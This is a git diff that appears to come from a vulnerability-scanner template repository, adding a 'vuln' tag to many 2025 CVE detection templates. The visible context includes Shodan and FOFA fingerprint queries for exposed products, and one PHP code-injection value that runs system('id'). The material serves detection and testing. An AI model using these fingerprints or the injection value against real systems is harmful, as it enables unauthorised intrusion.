a/http/cves/2025/CVE-2025-25231.yaml +++ b/http/cves/2025/CVE-2025-25231.yaml @@ -21,7 +21,7 @@ info: product: workspace_one_uem_console fofa-query: banner="/airwatch/default.aspx" || header="/airwatch/default.aspx" shodan-query: html:"/airwatch/default.aspx" - tags: cve,cve2025,omnissa,workspace,airwatch,traversal,vkev + tags: cve,cve2025,omnissa,workspace,airwatch,traversal,vkev,vuln flow: http(1) || http(2) diff --git a/http/cves/2025/CVE-2025-25257.yaml b/http/cves/2025/CVE-2025-25257.yaml index 1dd52a9a731..69356170815 100644 --- a/http/cves/2025/CVE-2025-25257.yaml +++ b/http/cves/2025/CVE-2025-25257.yaml @@ -29,7 +29,7 @@ info: shodan-query: - ssl:"cn=fortiweb" - title:"FortiWeb - " - tags: cve,cve2025,fortinet,fortiweb,sqli,unauth,kev,vkev + tags: cve,cve2025,fortinet,fortiweb,sqli,unauth,kev,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-2539.yaml b/http/cves/2025/CVE-2025-2539.yaml index 855e3ea2916..40bab9b2b9a 100644 --- a/http/cves/2025/CVE-2025-2539.yaml +++ b/http/cves/2025/CVE-2025-2539.yaml @@ -23,7 +23,7 @@ info: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/file-away/" - tags: cve,cve2025,lfi,file-away,wordpress,wp-plugin,wp,vkev + tags: cve,cve2025,lfi,file-away,wordpress,wp-plugin,wp,vkev,vuln flow: http(1) && http(2) && http(3) diff --git a/http/cves/2025/CVE-2025-2563.yaml b/http/cves/2025/CVE-2025-2563.yaml index f91780bee01..2a0030fead6 100644 --- a/http/cves/2025/CVE-2025-2563.yaml +++ b/http/cves/2025/CVE-2025-2563.yaml @@ -23,7 +23,7 @@ info: verified: true max-request: 6 fofa-query: body="/wp-content/plugins/user-registration" - tags: cve,cve2025,wp,wordpress,wp-plugin,user-registration,privilege-escalation + tags: cve,cve2025,wp,wordpress,wp-plugin,user-registration,privilege-escalation,vuln variables: username: "{{randbase(8)}}" diff --git a/http/cves/2025/CVE-2025-2609.yaml b/http/cves/2025/CVE-2025-2609.yaml index 091e1e1ac6e..e3c138f4ec6 100644 --- a/http/cves/2025/CVE-2025-2609.yaml +++ b/http/cves/2025/CVE-2025-2609.yaml @@ -25,7 +25,7 @@ info: product: magnusbilling shodan-query: html:"MagnusBilling" fofa-query: body="MagnusBilling" - tags: cve,cve2025,mbilling,stored,xss,authenticated,vkev + tags: cve,cve2025,mbilling,stored,xss,authenticated,vkev,vuln flow: http(1) && http(2) && http(3) && http(4) diff --git a/http/cves/2025/CVE-2025-2610.yaml b/http/cves/2025/CVE-2025-2610.yaml index 304e0cd4529..75c95f5cd45 100644 --- a/http/cves/2025/CVE-2025-2610.yaml +++ b/http/cves/2025/CVE-2025-2610.yaml @@ -25,7 +25,7 @@ info: product: magnusbilling shodan-query: http.html:"magnusbilling" fofa-query: body="magnusbilling" - tags: cve,cve2025,mbilling,xss,magnusbilling,authenticated,vkev + tags: cve,cve2025,mbilling,xss,magnusbilling,authenticated,vkev,vuln flow: http(1) && http(2) && http(3) && http(4) diff --git a/http/cves/2025/CVE-2025-26319.yaml b/http/cves/2025/CVE-2025-26319.yaml index 9dc48363479..74e3c486363 100644 --- a/http/cves/2025/CVE-2025-26319.yaml +++ b/http/cves/2025/CVE-2025-26319.yaml @@ -24,7 +24,7 @@ info: product: Flowise shodan-query: title:"Flowise" fofa-query: title="Flowise" - tags: cve,cve2025,flowise,fileupload,intrusive,vkev + tags: cve,cve2025,flowise,fileupload,intrusive,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2025/CVE-2025-2636.yaml b/http/cves/2025/CVE-2025-2636.yaml index 56c823a30b0..439a964816d 100644 --- a/http/cves/2025/CVE-2025-2636.yaml +++ b/http/cves/2025/CVE-2025-2636.yaml @@ -23,7 +23,7 @@ info: max-request: 1 verified: true fofa-query: body="/wp-content/plugins/instawp-connect" - tags: cve,cve2025,wp,wordpress,wp-plugin,instawp-connect,lfi,vkev + tags: cve,cve2025,wp,wordpress,wp-plugin,instawp-connect,lfi,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-26793.yaml b/http/cves/2025/CVE-2025-26793.yaml index 71aee258c01..f331865a2bf 100644 --- a/http/cves/2025/CVE-2025-26793.yaml +++ b/http/cves/2025/CVE-2025-26793.yaml @@ -17,7 +17,7 @@ info: verified: true max-request: 1 fofa-query: title="FREEDOM Administration" - tags: cve,cve2025,freedom,admin,mesh,vkev + tags: cve,cve2025,freedom,admin,mesh,vkev,vuln variables: username: "freedom" diff --git a/http/cves/2025/CVE-2025-27007.yaml b/http/cves/2025/CVE-2025-27007.yaml index a4e861cd3f4..0a6e35c6b34 100644 --- a/http/cves/2025/CVE-2025-27007.yaml +++ b/http/cves/2025/CVE-2025-27007.yaml @@ -21,7 +21,7 @@ info: verified: true max-request: 2 public-query: "/wp-content/plugins/suretriggers" - tags: cve,cve2025,ottokit,intrusive,priv,wordpress,wp-plugin,wp,suretriggers,vkev + tags: cve,cve2025,ottokit,intrusive,priv,wordpress,wp-plugin,wp,suretriggers,vkev,vuln variables: username: "admin" diff --git a/http/cves/2025/CVE-2025-2709.yaml b/http/cves/2025/CVE-2025-2709.yaml index d2845a417f0..8cc6ffbe629 100644 --- a/http/cves/2025/CVE-2025-2709.yaml +++ b/http/cves/2025/CVE-2025-2709.yaml @@ -23,7 +23,7 @@ info: vendor: yonyou product: ufida_erp-nc fofa-query: icon_hash="1085941792" - tags: cve,cve2025,xss,erp-nc,ufida,yonyou + tags: cve,cve2025,xss,erp-nc,ufida,yonyou,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-2710.yaml b/http/cves/2025/CVE-2025-2710.yaml index ac754e6c8b9..bfb5d6de9bb 100644 --- a/http/cves/2025/CVE-2025-2710.yaml +++ b/http/cves/2025/CVE-2025-2710.yaml @@ -28,7 +28,7 @@ info: product: ufida_erp-nc fofa-query: icon_hash="1085941792" shodan-query: title:"用友" - tags: cve,cve2025,xss,erp-nc,ufida,yonyou + tags: cve,cve2025,xss,erp-nc,ufida,yonyou,vuln flow: http(1) && http(2) diff --git a/http/cves/2025/CVE-2025-2711.yaml b/http/cves/2025/CVE-2025-2711.yaml index 126e4c531bd..5c124bec5ec 100644 --- a/http/cves/2025/CVE-2025-2711.yaml +++ b/http/cves/2025/CVE-2025-2711.yaml @@ -28,7 +28,7 @@ info: product: ufida_erp-nc fofa-query: icon_hash="1085941792" shodan-query: title:"用友" - tags: cve,cve2025,xss,erp-nc,ufida,yonyou + tags: cve,cve2025,xss,erp-nc,ufida,yonyou,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-27112.yaml b/http/cves/2025/CVE-2025-27112.yaml index 1d77bf6a040..b795bee0cbe 100644 --- a/http/cves/2025/CVE-2025-27112.yaml +++ b/http/cves/2025/CVE-2025-27112.yaml @@ -23,7 +23,7 @@ info: product: navidrome framework: go shodan-query: html:"content="Navidrome"" - tags: cve,cve2025,navidrome,vkev + tags: cve,cve2025,navidrome,vkev,vuln variables: username: "{{randstr}}" diff --git a/http/cves/2025/CVE-2025-2712.yaml b/http/cves/2025/CVE-2025-2712.yaml index 1de5121e7a3..dac01270173 100644 --- a/http/cves/2025/CVE-2025-2712.yaml +++ b/http/cves/2025/CVE-2025-2712.yaml @@ -22,7 +22,7 @@ info: vendor: yonyou product: ufida_erp-nc fofa-query: icon_hash="1085941792" - tags: cve,cve2025,xss,erp-nc,ufida,yonyou,vkev + tags: cve,cve2025,xss,erp-nc,ufida,yonyou,vkev,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-27134.yaml b/http/cves/2025/CVE-2025-27134.yaml index 60f606ab33f..52693a65717 100644 --- a/http/cves/2025/CVE-2025-27134.yaml +++ b/http/cves/2025/CVE-2025-27134.yaml @@ -23,7 +23,7 @@ info: product: joplin framework: "-" shodan-query: 'title:"Joplin Server"' - tags: cve,cve2025,auth,joplin,oss,default-login + tags: cve,cve2025,auth,joplin,oss,default-login,vuln variables: username: admin@localhost diff --git a/http/cves/2025/CVE-2025-27218.yaml b/http/cves/2025/CVE-2025-27218.yaml index dfb4152b971..bd2bd59b8dc 100644 --- a/http/cves/2025/CVE-2025-27218.yaml +++ b/http/cves/2025/CVE-2025-27218.yaml @@ -19,7 +19,7 @@ info: metadata: verified: true max-request: 1 - tags: cve,cve2025,oast,oob,sitecore,rce,vkev + tags: cve,cve2025,oast,oob,sitecore,rce,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-27222.yaml b/http/cves/2025/CVE-2025-27222.yaml index 320c0dfe843..b95295675c4 100644 --- a/http/cves/2025/CVE-2025-27222.yaml +++ b/http/cves/2025/CVE-2025-27222.yaml @@ -16,7 +16,7 @@ info: verified: true max-request: 1 fofa-query: body="TRUfusion" - tags: cve,cve2025,trufusion,lfi + tags: cve,cve2025,trufusion,lfi,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-27223.yaml b/http/cves/2025/CVE-2025-27223.yaml index c8922f1ff6a..c057f403715 100644 --- a/http/cves/2025/CVE-2025-27223.yaml +++ b/http/cves/2025/CVE-2025-27223.yaml @@ -16,7 +16,7 @@ info: verified: true max-request: 1 fofa-query: body="TRUfusion" - tags: cve,cve2025,trufusion,auth-bypass,vkev + tags: cve,cve2025,trufusion,auth-bypass,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-27225.yaml b/http/cves/2025/CVE-2025-27225.yaml index 9744e3cac3a..c47bacc95dd 100644 --- a/http/cves/2025/CVE-2025-27225.yaml +++ b/http/cves/2025/CVE-2025-27225.yaml @@ -21,7 +21,7 @@ info: verified: true max-request: 1 fofa-query: body="TRUfusion" - tags: cve,cve2025,trufusion,auth-bypass + tags: cve,cve2025,trufusion,auth-bypass,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-2746.yaml b/http/cves/2025/CVE-2025-2746.yaml index 1f54a4a2b2c..e620833d84f 100644 --- a/http/cves/2025/CVE-2025-2746.yaml +++ b/http/cves/2025/CVE-2025-2746.yaml @@ -21,7 +21,7 @@ info: verified: true max-request: 1 fofa-query: app="Kentico-CMS" - tags: cve,cve2025,kentico,stag,auth-bypass,xperience13 + tags: cve,cve2025,kentico,stag,auth-bypass,xperience13,vuln variables: rand: "{{to_lower(rand_text_alpha(32))}}" diff --git a/http/cves/2025/CVE-2025-2747.yaml b/http/cves/2025/CVE-2025-2747.yaml index 46b6b4dbf0c..ad94db7ecaa 100644 --- a/http/cves/2025/CVE-2025-2747.yaml +++ b/http/cves/2025/CVE-2025-2747.yaml @@ -22,7 +22,8 @@ info: verified: true max-request: 1 fofa-query: app="Kentico-CMS" - tags: cve,cve2025,kentico,stag,auth-bypass,xperience13,kev,vkev + tags: cve,cve2025,kentico,stag,auth-bypass,xperience13,kev,vkev,vuln + variables: rand: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2025/CVE-2025-2748.yaml b/http/cves/2025/CVE-2025-2748.yaml index 24fa0729697..710e8fef9b2 100644 --- a/http/cves/2025/CVE-2025-2748.yaml +++ b/http/cves/2025/CVE-2025-2748.yaml @@ -20,7 +20,7 @@ info: verified: true max-request: 2 fofa-query: app="Kentico-CMS" - tags: cve,cve2025,kentico,xss,unauth,intrusive,vkev + tags: cve,cve2025,kentico,xss,unauth,intrusive,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2025/CVE-2025-27505.yaml b/http/cves/2025/CVE-2025-27505.yaml index b9214fd43ff..1295abe3d03 100644 --- a/http/cves/2025/CVE-2025-27505.yaml +++ b/http/cves/2025/CVE-2025-27505.yaml @@ -25,7 +25,7 @@ info: shodan-query: http.title:"geoserver" vendor: osgeo product: geoserver - tags: cve,cve2025,geoserver,misconfig,osgeo,vkev + tags: cve,cve2025,geoserver,misconfig,osgeo,vkev,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-2775.yaml b/http/cves/2025/CVE-2025-2775.yaml index b563728beae..87bbf36fd94 100644 --- a/http/cves/2025/CVE-2025-2775.yaml +++ b/http/cves/2025/CVE-2025-2775.yaml @@ -22,7 +22,7 @@ info: product: sysaid shodan-query: http.favicon.hash:"1540720428" fofa-query: icon_hash=1540720428 - tags: cve,cve2025,oast,sysaid,xxe,kev,vkev + tags: cve,cve2025,oast,sysaid,xxe,kev,vkev,vuln variables: filename: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2025/CVE-2025-2776.yaml b/http/cves/2025/CVE-2025-2776.yaml index ad80971da68..0ab58779d37 100644 --- a/http/cves/2025/CVE-2025-2776.yaml +++ b/http/cves/2025/CVE-2025-2776.yaml @@ -22,7 +22,7 @@ info: product: sysaid shodan-query: http.favicon.hash:"1540720428" fofa-query: icon_hash=1540720428 - tags: cve,cve2025,sysaid,xxe,oast,kev,vkev + tags: cve,cve2025,sysaid,xxe,oast,kev,vkev,vuln variables: filename: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2025/CVE-2025-2777.yaml b/http/cves/2025/CVE-2025-2777.yaml index 55315f4aa91..6d2365821c8 100644 --- a/http/cves/2025/CVE-2025-2777.yaml +++ b/http/cves/2025/CVE-2025-2777.yaml @@ -22,7 +22,7 @@ info: product: sysaid shodan-query: http.favicon.hash:"1540720428" fofa-query: icon_hash=1540720428 - tags: cve,cve2025,oast,sysaid,xxe,vkev + tags: cve,cve2025,oast,sysaid,xxe,vkev,vuln variables: filename: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2025/CVE-2025-27888.yaml b/http/cves/2025/CVE-2025-27888.yaml index d2c648fc810..c57e5a23745 100644 --- a/http/cves/2025/CVE-2025-27888.yaml +++ b/http/cves/2025/CVE-2025-27888.yaml @@ -20,7 +20,7 @@ info: shodan-query: http.title:"apache druid" fofa-query: title="apache druid" google-query: intitle:"apache druid" - tags: cve,cve2025,apache,druid,ssrf,oast,oss + tags: cve,cve2025,apache,druid,ssrf,oast,oss,vuln flow: http(1) && http(2) diff --git a/http/cves/2025/CVE-2025-27892.yaml b/http/cves/2025/CVE-2025-27892.yaml index e13a70816ae..1de7e93765f 100644 --- a/http/cves/2025/CVE-2025-27892.yaml +++ b/http/cves/2025/CVE-2025-27892.yaml @@ -21,7 +21,7 @@ info: vendor: shopware product: shopware verified: true - tags: cve,cve2025,shopware,sqli,time-based-sqli + tags: cve,cve2025,shopware,sqli,time-based-sqli,vuln variables: token: "{{token}}" diff --git a/http/cves/2025/CVE-2025-28228.yaml b/http/cves/2025/CVE-2025-28228.yaml index e144d9cdd3e..3eb30abf5a4 100644 --- a/http/cves/2025/CVE-2025-28228.yaml +++ b/http/cves/2025/CVE-2025-28228.yaml @@ -19,7 +19,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Electrolink" - tags: cve,cve2025,electrolink,info-leak + tags: cve,cve2025,electrolink,info-leak,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-28367.yaml b/http/cves/2025/CVE-2025-28367.yaml index e19df050a78..f3b1d2d8f32 100644 --- a/http/cves/2025/CVE-2025-28367.yaml +++ b/http/cves/2025/CVE-2025-28367.yaml @@ -21,7 +21,7 @@ info: verified: true max-request: 1 fofa-query: app="mojoportal" - tags: cve,cve2025,mojoportal,lfi,vkev + tags: cve,cve2025,mojoportal,lfi,vkev,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-28906.yaml b/http/cves/2025/CVE-2025-28906.yaml index adbd7b78790..7abe80d3354 100644 --- a/http/cves/2025/CVE-2025-28906.yaml +++ b/http/cves/2025/CVE-2025-28906.yaml @@ -21,7 +21,7 @@ info: verified: true max-request: 5 publicwww-query: "/wp-content/plugins/wp-skitter-slideshow/" - tags: cve,cve2025,wp-plugin,wp-skitter-slideshow,wordpress,wp,xss,authenticated + tags: cve,cve2025,wp-plugin,wp-skitter-slideshow,wordpress,wp,xss,authenticated,vuln flow: http(1) && http(2) diff --git a/http/cves/2025/CVE-2025-2907.yaml b/http/cves/2025/CVE-2025-2907.yaml index 4839e9cc8ae..467bb29fff6 100644 --- a/http/cves/2025/CVE-2025-2907.yaml +++ b/http/cves/2025/CVE-2025-2907.yaml @@ -22,7 +22,7 @@ info: verified: true max-request: 4 fofa-query: body="wp-content/plugins/order-delivery-date-for-woocommerce" - tags: cve,cve2025,wp,wordpress,wp-plugin,takeover,order-delivery-date,vkev + tags: cve,cve2025,wp,wordpress,wp-plugin,takeover,order-delivery-date,vkev,vuln flow: http(1) && http(2) && http(3) diff --git a/http/cves/2025/CVE-2025-29085.yaml b/http/cves/2025/CVE-2025-29085.yaml index 5e31fb52a45..42737baede2 100644 --- a/http/cves/2025/CVE-2025-29085.yaml +++ b/http/cves/2025/CVE-2025-29085.yaml @@ -18,7 +18,7 @@ info: epss-percentile: 0.88111 metadata: verified: true - tags: cve,cve2025,vipshop,sqli,vkev + tags: cve,cve2025,vipshop,sqli,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-29306.yaml b/http/cves/2025/CVE-2025-29306.yaml index c869d05ecfd..2ab6aa95d19 100644 --- a/http/cves/2025/CVE-2025-29306.yaml +++ b/http/cves/2025/CVE-2025-29306.yaml @@ -25,7 +25,7 @@ info: fofa-query: (body="foxcms-logo" || body="foxcms-container") && body="div" google-query: intitle:"FOXCMS" intext:"foxcms-logo" shodan-query: html:"foxcms-logo" - tags: cve,cve2025,rce,foxcms,unauth,oast,vkev + tags: cve,cve2025,rce,foxcms,unauth,oast,vkev,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-29925.yaml b/http/cves/2025/CVE-2025-29925.yaml index 5019e15ac0a..a3db082fa60 100644 --- a/http/cves/2025/CVE-2025-29925.yaml +++ b/http/cves/2025/CVE-2025-29925.yaml @@ -18,7 +18,7 @@ info: product: xwiki shodan-query: html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" - tags: cve,cve2025,xwiki,rest-api,exposure,vkev + tags: cve,cve2025,xwiki,rest-api,exposure,vkev,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-29927.yaml b/http/cves/2025/CVE-2025-29927.yaml index 138c9a27ff0..30cef320e96 100644 --- a/http/cves/2025/CVE-2025-29927.yaml +++ b/http/cves/2025/CVE-2025-29927.yaml @@ -27,7 +27,7 @@ info: fofa-query: "x-middleware-rewrite" product: next.js vendor: zeit - tags: cve,cve2025,nextjs,middleware,auth-bypass,vkev + tags: cve,cve2025,nextjs,middleware,auth-bypass,vkev,vuln flow: | let base_check = function () { diff --git a/http/cves/2025/CVE-2025-30208.yaml b/http/cves/2025/CVE-2025-30208.yaml index a922cffd904..adaf18f7bf9 100644 --- a/http/cves/2025/CVE-2025-30208.yaml +++ b/http/cves/2025/CVE-2025-30208.yaml @@ -20,7 +20,7 @@ info: verified: true max-request: 1 fofa-query: 'body="/@vite/client"' - tags: cve,cve2025,arbitrary-file-read,vite,CVE-2025-30208,vkev + tags: cve,cve2025,arbitrary-file-read,vite,CVE-2025-30208,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2025/CVE-2025-30220.yaml b/http/cves/2025/CVE-2025-30220.yaml index 8612e0d9f0b..a67aa1eb64a 100644 --- a/http/cves/2025/CVE-2025-30220.yaml +++ b/http/cves/2025/CVE-2025-30220.yaml @@ -35,7 +35,7 @@ info: - app="geoserver" - icon_hash="97540678" - body="/geoserver/" - tags: cve,cve2025,geoserver,xxe,oast,oob,ssrf,unauth,vkev + tags: cve,cve2025,geoserver,xxe,oast,oob,ssrf,unauth,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2025/CVE-2025-30406.yaml b/http/cves/2025/CVE-2025-30406.yaml index 294e3bd8e96..e6dc329ca1e 100644 --- a/http/cves/2025/CVE-2025-30406.yaml +++ b/http/cves/2025/CVE-2025-30406.yaml @@ -21,7 +21,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:1163764264 - tags: cve,cve2025,gladinet,rce,centrestack,deserialization,kev,vkev + tags: cve,cve2025,gladinet,rce,centrestack,deserialization,kev,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-30567.yaml b/http/cves/2025/CVE-2025-30567.yaml index 565445eb272..7a7762cd546 100644 --- a/http/cves/2025/CVE-2025-30567.yaml +++ b/http/cves/2025/CVE-2025-30567.yaml @@ -23,7 +23,7 @@ info: vendor: wp01ru product: wp01 framework: wordpress - tags: cve,cve2025,lfi,wp-plugin,wordpress,wp01,wp,vkev + tags: cve,cve2025,lfi,wp-plugin,wordpress,wp01,wp,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2025/CVE-2025-3102.yaml b/http/cves/2025/CVE-2025-3102.yaml index 5330da107fe..789b32da96d 100644 --- a/http/cves/2025/CVE-2025-3102.yaml +++ b/http/cves/2025/CVE-2025-3102.yaml @@ -22,7 +22,7 @@ info: verified: true max-request: 1 public-query: "/wp-content/plugins/suretriggers" - tags: cve,cve2025,ottokit,intrusive,priv,wordpress,wp-plugin,wp,suretriggers,vkev + tags: cve,cve2025,ottokit,intrusive,priv,wordpress,wp-plugin,wp,suretriggers,vkev,vuln variables: username: "{{rand_base(6)}}" diff --git a/http/cves/2025/CVE-2025-31125.yaml b/http/cves/2025/CVE-2025-31125.yaml index 1989aab9812..1883d6ec4ca 100644 --- a/http/cves/2025/CVE-2025-31125.yaml +++ b/http/cves/2025/CVE-2025-31125.yaml @@ -25,7 +25,7 @@ info: max-requests: 4 shodan-query: title:"Vite App" fofa-query: title="Vite App" - tags: cve,cve2025,vite,lfi,vkev + tags: cve,cve2025,vite,lfi,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-31131.yaml b/http/cves/2025/CVE-2025-31131.yaml index c1bf85081ef..df27961baef 100644 --- a/http/cves/2025/CVE-2025-31131.yaml +++ b/http/cves/2025/CVE-2025-31131.yaml @@ -22,7 +22,7 @@ info: verified: true max-request: 1 shodan-query: html:"yeswiki" - tags: cve,cve2025,yeswiki,lfi + tags: cve,cve2025,yeswiki,lfi,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-31161.yaml b/http/cves/2025/CVE-2025-31161.yaml index 086408c81e9..09cff63f77c 100644 --- a/http/cves/2025/CVE-2025-31161.yaml +++ b/http/cves/2025/CVE-2025-31161.yaml @@ -30,7 +30,7 @@ info: - icon_hash="-1022206565" - title="CrushFTP WebInterface" - body="crushftp" - tags: cve,cve2025,crushftp,unauth,auth-bypass,rce,kev,vkev + tags: cve,cve2025,crushftp,unauth,auth-bypass,rce,kev,vkev,vuln variables: string_1: "{{rand_text_numeric(13)}}" diff --git a/http/cves/2025/CVE-2025-31324.yaml b/http/cves/2025/CVE-2025-31324.yaml index 3d1d2e54212..3c1700a1602 100644 --- a/http/cves/2025/CVE-2025-31324.yaml +++ b/http/cves/2025/CVE-2025-31324.yaml @@ -22,7 +22,7 @@ info: verified: true max-request: 1 shodan-query: html:"SAP NetWeaver Application Server Java" - tags: cve,cve2025,sap,netweaver,rce,deserialization,kev,vkev + tags: cve,cve2025,sap,netweaver,rce,deserialization,kev,vkev,vuln variables: oast: ".{{interactsh-url}}" diff --git a/http/cves/2025/CVE-2025-31489.yaml b/http/cves/2025/CVE-2025-31489.yaml index f40e54248cd..0f920e57ff7 100644 --- a/http/cves/2025/CVE-2025-31489.yaml +++ b/http/cves/2025/CVE-2025-31489.yaml @@ -24,7 +24,7 @@ info: - app="minio-console" - title="minio console" google-query: intitle:"minio console" - tags: cve,cve2025,minio,signature-bypass,intrusive + tags: cve,cve2025,minio,signature-bypass,intrusive,vuln variables: bucket: "{{bucket}}" diff --git a/http/cves/2025/CVE-2025-32101.yaml b/http/cves/2025/CVE-2025-32101.yaml index 843be82ea8c..bc218549e0d 100644 --- a/http/cves/2025/CVE-2025-32101.yaml +++ b/http/cves/2025/CVE-2025-32101.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 3 fofa-query: body="Powered by UNA" - tags: cve,cve2025,una-cms,php,rce + tags: cve,cve2025,una-cms,php,rce,vuln variables: cmd: "echo '{{randstr}}'. system('id') . '{{randstr}}';" diff --git a/http/cves/2025/CVE-2025-32430.yaml b/http/cves/2025/CVE-2025-32430.yaml index 71459b5adac..fb8342c8e50 100644 --- a/http/cves/2025/CVE-2025-32430.yaml +++ b/http/cves/2025/CVE-2025-32430.yaml @@ -24,7 +24,7 @@ info: product: xwiki-platform shodan-query: http.html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" - tags: cve,cve2025,xwiki,xss + tags: cve,cve2025,xwiki,xss,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-32432.yaml b/http/cves/2025/CVE-2025-32432.yaml index c329040925d..552350e7c6e 100644 --- a/http/cves/2025/CVE-2025-32432.yaml +++ b/http/cves/2025/CVE-2025-32432.yaml @@ -25,7 +25,7 @@ info: vendor: craftcms product: craftcms shodan-query: http.component:"Craft CMS" - tags: cve,cve2025,craftcms,rce,vkev + tags: cve,cve2025,craftcms,rce,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2025/CVE-2025-3248.yaml b/http/cves/2025/CVE-2025-3248.yaml index 3fc5f184dbd..9dd2df23b58 100644 --- a/http/cves/2025/CVE-2025-3248.yaml +++ b/http/cves/2025/CVE-2025-3248.yaml @@ -20,7 +20,7 @@ info: verified: true max-request: 1 shodan-query: html:"Langflow" - tags: cve,cve2025,python,rce,injection,kev,langflow,vkev + tags: cve,cve2025,python,rce,injection,kev,langflow,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-32813.yaml b/http/cves/2025/CVE-2025-32813.yaml index 1f468bd439f..66c44c36878 100644 --- a/http/cves/2025/CVE-2025-32813.yaml +++ b/http/cves/2025/CVE-2025-32813.yaml @@ -23,7 +23,7 @@ info: vendor: infoblox product: netmri fofa-query: "Infoblox NetMRI" - tags: cve,cve2025,infoblox,netmri,rce,vkev + tags: cve,cve2025,infoblox,netmri,rce,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-32814.yaml b/http/cves/2025/CVE-2025-32814.yaml index 061d52142ca..55539a117cd 100644 --- a/http/cves/2025/CVE-2025-32814.yaml +++ b/http/cves/2025/CVE-2025-32814.yaml @@ -23,7 +23,7 @@ info: vendor: infoblox product: netmri fofa-query: icon_hash="-319724102" - tags: cve,cve2025,sqli,unauth,netmri,rails,error-based,vkev + tags: cve,cve2025,sqli,unauth,netmri,rails,error-based,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-32815.yaml b/http/cves/2025/CVE-2025-32815.yaml index abfe6854b52..f7bfc72bfe2 100644 --- a/http/cves/2025/CVE-2025-32815.yaml +++ b/http/cves/2025/CVE-2025-32815.yaml @@ -23,7 +23,7 @@ info: vendor: infoblox product: netmri fofa-query: icon_hash="-319724102" - tags: cve,cve2025,auth-bypass,netmri,hardcoded,infoblox,vkev + tags: cve,cve2025,auth-bypass,netmri,hardcoded,infoblox,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-32969.yaml b/http/cves/2025/CVE-2025-32969.yaml index 92a6131e54e..d162a8f7e85 100644 --- a/http/cves/2025/CVE-2025-32969.yaml +++ b/http/cves/2025/CVE-2025-32969.yaml @@ -24,7 +24,7 @@ info: product: xwiki shodan-query: html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" - tags: cve,cve2025,xwiki,sqli,rest-api,vkev + tags: cve,cve2025,xwiki,sqli,rest-api,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-32970.yaml b/http/cves/2025/CVE-2025-32970.yaml index 13dafe6550f..3e27f4ca305 100644 --- a/http/cves/2025/CVE-2025-32970.yaml +++ b/http/cves/2025/CVE-2025-32970.yaml @@ -21,7 +21,7 @@ info: product: xwiki shodan-query: html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" - tags: cve,cve2025,xwiki,redirect,vkev + tags: cve,cve2025,xwiki,redirect,vkev,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-34023.yaml b/http/cves/2025/CVE-2025-34023.yaml index 13a7caf927e..ee5dea371d0 100644 --- a/http/cves/2025/CVE-2025-34023.yaml +++ b/http/cves/2025/CVE-2025-34023.yaml @@ -18,7 +18,7 @@ info: cwe-id: CWE-22 metadata: max-request: 1 - tags: cve,cve2025,karel,lfi,vkev + tags: cve,cve2025,karel,lfi,vkev,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-34026.yaml b/http/cves/2025/CVE-2025-34026.yaml index b42b8fa3bad..533504b56bc 100644 --- a/http/cves/2025/CVE-2025-34026.yaml +++ b/http/cves/2025/CVE-2025-34026.yaml @@ -20,7 +20,7 @@ info: product: concerto max-request: 1 shodan-query: http.favicon.hash:-534530225 - tags: versa,concerto,actuator,auth-bypass,springboot,cve,cve2025,vkev + tags: versa,concerto,actuator,auth-bypass,springboot,cve,cve2025,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-34027.yaml b/http/cves/2025/CVE-2025-34027.yaml index 95099a59823..d616899c43c 100644 --- a/http/cves/2025/CVE-2025-34027.yaml +++ b/http/cves/2025/CVE-2025-34027.yaml @@ -21,7 +21,7 @@ info: product: concerto max-request: 1 shodan-query: http.favicon.hash:-534530225 - tags: cve,cve2025,versa,concerto,auth-bypass,vkev + tags: cve,cve2025,versa,concerto,auth-bypass,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-34028.yaml b/http/cves/2025/CVE-2025-34028.yaml index 65c98576b9e..4b9bae8ea66 100644 --- a/http/cves/2025/CVE-2025-34028.yaml +++ b/http/cves/2025/CVE-2025-34028.yaml @@ -21,7 +21,7 @@ info: verified: true max-request: 1 fofa-query: icon_hash="1209838013" - tags: cve,cve2025,ssrf,oast,commvault,kev,vkev + tags: 